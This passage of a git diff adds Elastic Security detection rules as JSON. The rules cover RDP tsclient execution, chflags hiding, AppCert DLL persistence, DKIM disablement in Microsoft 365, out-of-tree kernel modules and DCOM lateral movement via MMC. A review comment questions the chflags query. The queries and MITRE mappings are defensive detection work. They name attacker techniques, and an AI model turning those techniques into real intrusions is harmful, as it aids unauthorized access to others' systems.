a/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_108.json b/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_108.json new file mode 100644 index 00000000000..ac6819ac923 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_108.json 
@@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies execution from the Remote Desktop Protocol (RDP) shared mountpoint tsclient on the target host. This may indicate a lateral movement attempt.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Execution via TSClient Mountpoint", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.executable : \"\\\\Device\\\\Mup\\\\tsclient\\\\*.exe\"\n", + "references": [ + "https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "4fe9d835-40e1-452d-8230-17c147cafad8", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": 
"TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.001", + "name": "Remote Desktop Protocol", + "reference": "https://attack.mitre.org/techniques/T1021/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "4fe9d835-40e1-452d-8230-17c147cafad8_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_109.json b/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_109.json new file mode 100644 index 00000000000..92283183538 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_109.json 
@@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies execution from the Remote Desktop Protocol (RDP) shared mountpoint tsclient on the target host. This may indicate a lateral movement attempt.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Execution via TSClient Mountpoint", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.executable : \"\\\\Device\\\\Mup\\\\tsclient\\\\*.exe\"\n", + "references": [ + "https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "4fe9d835-40e1-452d-8230-17c147cafad8", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": 
"TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.001", + "name": "Remote Desktop Protocol", + "reference": "https://attack.mitre.org/techniques/T1021/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "4fe9d835-40e1-452d-8230-17c147cafad8_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5124e65f-df97-4471-8dcb-8e3953b3ea97_2.json b/packages/security_detection_engine/kibana/security_rule/5124e65f-df97-4471-8dcb-8e3953b3ea97_2.json new file mode 100644 index 00000000000..64ad90ebbe7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5124e65f-df97-4471-8dcb-8e3953b3ea97_2.json 
@@ -0,0 +1,86 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identify activity related where adversaries can add the 'hidden' flag to files to hide them from the user in an attempt to evade detection.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Hidden Files and Directories via Hidden Flag", + "query": "file where event.type == \"creation\" and process.name == \"chflags\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "5124e65f-df97-4471-8dcb-8e3953b3ea97", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Rule Type: BBR", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/", + "subtechnique": [ + { + "id": "T1564.001", + "name": "Hidden Files and Directories", + "reference": "https://attack.mitre.org/techniques/T1564/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "5124e65f-df97-4471-8dcb-8e3953b3ea97_2", + "type": "security-rule" +} \ No newline at end of file 
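Review bot: The query `file where event.type == "creation" and process.name == "chflags"` never checks which flag is being set, so `chflags nohidden` or `chflags uchg` fires a rule named after the hidden flag; as a low-risk building block that breadth may be deliberate, but then the name and description overstate what is detected. If the hidden flag is the intent, add `and process.args : "hidden"` (and `process.args` to `required_fields`), bearing in mind chflags accepts comma-joined flag lists so a broader match may be needed; if breadth is wanted, rename to something like "File Flag Modification via chflags". Unlike the neighbouring rules there is also no `host.os.type` clause although the tags claim Linux and macOS; chflags is a BSD/macOS command, so `host.os.type == "macos"` (or `in ("linux", "macos")` if a Linux port really is expected) would keep the `auditbeat-*` and `endgame-*` indices from contributing unrelated platforms.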
diff --git a/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_107.json b/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_107.json new file mode 100644 index 00000000000..83e52543ef0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_107.json 
@@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects attempts to maintain persistence by creating registry keys using AppCert DLLs. AppCert DLLs are loaded by every process using the common API functions to create processes.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Registry Persistence via AppCert DLL", + "query": "registry where host.os.type == \"windows\" and\n/* uncomment once stable length(bytes_written_string) > 0 and */\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "513f0ffd-b317-4b9c-9494-92ce861f22c7", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: 
Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.009", + "name": "AppCert DLLs", + "reference": "https://attack.mitre.org/techniques/T1546/009/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.009", + "name": "AppCert DLLs", + "reference": "https://attack.mitre.org/techniques/T1546/009/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "513f0ffd-b317-4b9c-9494-92ce861f22c7_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_108.json b/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_108.json new file mode 100644 index 00000000000..8dd69f650bb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_108.json 
@@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects attempts to maintain persistence by creating registry keys using AppCert DLLs. AppCert DLLs are loaded by every process using the common API functions to create processes.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Registry Persistence via AppCert DLL", + "query": "registry where host.os.type == \"windows\" and\n/* uncomment once stable length(bytes_written_string) > 0 and */\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "513f0ffd-b317-4b9c-9494-92ce861f22c7", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data 
Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.009", + "name": "AppCert DLLs", + "reference": "https://attack.mitre.org/techniques/T1546/009/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.009", + "name": "AppCert DLLs", + "reference": "https://attack.mitre.org/techniques/T1546/009/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "513f0ffd-b317-4b9c-9494-92ce861f22c7_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_103.json b/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_103.json new file mode 100644 index 00000000000..3f5e28f19aa --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_103.json 
@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a DomainKeys Identified Mail (DKIM) signing configuration is disabled in Microsoft 365. With DKIM in Microsoft 365, messages that are sent from Exchange Online will be cryptographically signed. This will allow the receiving email system to validate that the messages were generated by a server that the organization authorized and were not spoofed.", + "false_positives": [ + "Disabling a DKIM configuration may be done by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange DKIM Signing Configuration Disabled", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Set-DkimSigningConfig\" and o365.audit.Parameters.Enabled:False and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/set-dkimsigningconfig?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.Enabled", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "514121ce-c7b6-474a-8237-68ff71672379", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + 
"severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1556", + "name": "Modify Authentication Process", + "reference": "https://attack.mitre.org/techniques/T1556/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "514121ce-c7b6-474a-8237-68ff71672379_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_105.json b/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_105.json new file mode 100644 index 00000000000..578fd0049ba --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_105.json 
@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a DomainKeys Identified Mail (DKIM) signing configuration is disabled in Microsoft 365. With DKIM in Microsoft 365, messages that are sent from Exchange Online will be cryptographically signed. This will allow the receiving email system to validate that the messages were generated by a server that the organization authorized and were not spoofed.", + "false_positives": [ + "Disabling a DKIM configuration may be done by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange DKIM Signing Configuration Disabled", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Set-DkimSigningConfig\" and o365.audit.Parameters.Enabled:False and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/set-dkimsigningconfig?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.Enabled", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "514121ce-c7b6-474a-8237-68ff71672379", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + 
"severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1556", + "name": "Modify Authentication Process", + "reference": "https://attack.mitre.org/techniques/T1556/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "514121ce-c7b6-474a-8237-68ff71672379_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_206.json b/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_206.json new file mode 100644 index 00000000000..40d06c3064e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_206.json 
@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a DomainKeys Identified Mail (DKIM) signing configuration is disabled in Microsoft 365. With DKIM in Microsoft 365, messages that are sent from Exchange Online will be cryptographically signed. This will allow the receiving email system to validate that the messages were generated by a server that the organization authorized and were not spoofed.", + "false_positives": [ + "Disabling a DKIM configuration may be done by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange DKIM Signing Configuration Disabled", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Set-DkimSigningConfig\" and o365.audit.Parameters.Enabled:False and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/set-dkimsigningconfig?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.Enabled", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "514121ce-c7b6-474a-8237-68ff71672379", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + 
"severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1556", + "name": "Modify Authentication Process", + "reference": "https://attack.mitre.org/techniques/T1556/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "514121ce-c7b6-474a-8237-68ff71672379_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/51a09737-80f7-4551-a3be-dac8ef5d181a_2.json b/packages/security_detection_engine/kibana/security_rule/51a09737-80f7-4551-a3be-dac8ef5d181a_2.json new file mode 100644 index 00000000000..afeae342851 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/51a09737-80f7-4551-a3be-dac8ef5d181a_2.json 
@@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors the syslog log file for messages related to instances of a out-of-tree kernel module load, indicating the taining of the kernel. Rootkits often leverage kernel modules as their main defense evasion technique. Detecting tainted kernel module loads is crucial for ensuring system security and integrity, as malicious or unauthorized modules can compromise the kernel and lead to system vulnerabilities or unauthorized access.", + "from": "now-9m", + "index": [ + "logs-system.syslog-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Tainted Out-Of-Tree Kernel Module Load", + "query": "host.os.type:linux and event.dataset:\"system.syslog\" and process.name:kernel and \nmessage:\"loading out-of-tree module taints kernel.\"\n", + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "message", + "type": "match_only_text" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "51a09737-80f7-4551-a3be-dac8ef5d181a", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Filebeat\n\n### Filebeat Setup\nFilebeat is a lightweight shipper for forwarding and centralizing log data. Installed as an agent on your servers, Filebeat monitors the log files or locations that you specify, collects log events, and forwards them either to Elasticsearch or Logstash for indexing.\n\n#### The following steps should be executed in order to add the Filebeat for the Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setup-repositories.html).\n- To run Filebeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-docker.html).\n- To run Filebeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-kubernetes.html).\n- For quick start information for Filebeat refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/8.11/filebeat-installation-configuration.html).\n- For complete Setup and Run Filebeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setting-up-and-running.html).\n\n#### Rule Specific Setup Note\n- This rule requires the Filebeat System Module to be enabled.\n- The system module collects and parses logs created by the system logging service of common Unix/Linux based distributions.\n- To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.006", + "name": "Kernel Modules and Extensions", + "reference": "https://attack.mitre.org/techniques/T1547/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + 
"tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1014", + "name": "Rootkit", + "reference": "https://attack.mitre.org/techniques/T1014/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 2 + }, + "id": "51a09737-80f7-4551-a3be-dac8ef5d181a_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_107.json b/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_107.json new file mode 100644 index 00000000000..2aee1217d44 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_107.json 
@@ -0,0 +1,155 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of Distributed Component Object Model (DCOM) to run commands from a remote host, which are launched via the MMC20 Application COM Object. This behavior may indicate an attacker abusing a DCOM application to move laterally.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Incoming DCOM Lateral Movement with MMC", + "query": "sequence by host.id with maxspan=1m\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"mmc.exe\" and source.port >= 49152 and\n destination.port >= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\"\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"mmc.exe\"\n ] by process.parent.entity_id\n", + "references": [ + "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + 
"type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + } + ], + "risk_score": 73, + "rule_id": "51ce96fb-9e52-4dad-b0ba-99b54440fc9a", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.003", + "name": "Distributed Component Object Model", + "reference": "https://attack.mitre.org/techniques/T1021/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.014", + "name": "MMC", + 